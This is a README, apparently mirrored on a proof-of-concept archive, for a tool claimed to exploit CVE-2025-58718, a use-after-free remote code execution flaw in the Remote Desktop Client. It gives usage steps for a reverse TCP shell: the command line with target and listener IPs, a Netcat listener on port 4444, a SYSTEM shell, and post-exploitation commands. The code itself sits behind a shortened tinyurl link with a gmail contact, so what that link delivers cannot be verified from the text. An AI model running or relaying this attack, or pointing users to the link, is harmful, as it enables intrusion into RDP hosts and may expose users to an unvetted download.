Associated vulnerability

Introduction

# CVE-2025-58718: Remote Desktop Client RCE
## Disclaimer
This tool is for authorized security testing only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The authors are not responsible for misuse.
## Exploit Overview
This exploit targets CVE-2025-58718, a use-after-free vulnerability in the Microsoft Remote Desktop Client that enables remote code execution over a network. It allows an attacker to execute arbitrary code on a vulnerable system by initiating a malformed RDP connection.
The exploit uses crafted RDP packets to trigger the use-after-free condition during the connection handshake, overwriting heap structures so that a shellcode payload is executed. The provided script includes a reverse TCP shell payload that connects back to a Netcat listener, granting remote access to the target system.
### Key Technical Details
- **Vulnerability Type**: Use-After-Free in RDP protocol handling.
- **Attack Vector**: Network-based, via TCP/3389 (default RDP port).
- **Prerequisites**: Target has Remote Desktop enabled and exposed; no authentication required for exploit trigger.
### Affected Versions
- Windows 10 (1607, 1809, 21H2, 22H2)
- Windows 11 (22H2, 23H2, 24H2, 25H2)
- Windows Server (2008 SP2/R2 SP1, 2012/R2, 2016, 2019, 2022/23H2, 2025)
- Remote Desktop App Client
## Usage
1. **Prerequisites**:
   - Install Python 3.x and dependencies (`pip install -r requirements.txt`).
   - Ensure Netcat (`nc`) is installed on your system.
   - Generate or customize shellcode for your environment (default provided is x64 reverse TCP).
2. **Setup Listener**:
   - The script automatically starts a Netcat listener on the specified port (default: 4444).
   - Ensure your listener IP is reachable by the target (e.g., public IP or same network).
3. **Run Exploit**:
   - Execute: `python cve-2025-58718.py --target <TARGET_IP> --listener-ip <YOUR_IP> --listener-port 4444`.
   - Example: `python cve-2025-58718.py --target 192.168.1.100 --listener-ip 192.168.1.10 --listener-port 4444`.
4. **Monitor**:
   - Check the Netcat listener output for a reverse shell connection.
   - On success, you’ll receive a command shell with SYSTEM privileges.
5. **Post-Exploitation**:
   - Use the shell for further enumeration or privilege escalation (e.g., `whoami`, `net user`).
### Exploit
[href](https://tinyurl.com/yjbh9pbc)
For any inquiries, please email me at: eviedejesu803@gmail.com
File snapshot

 [4.0K]  /data/pocs/5258e1d91155fce0fcc607bd003dab94a27c1e0d
└── [2.4K]  README.md
0 directories, 1 file

Notes

1. Accessing the PoC through its original source is recommended.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.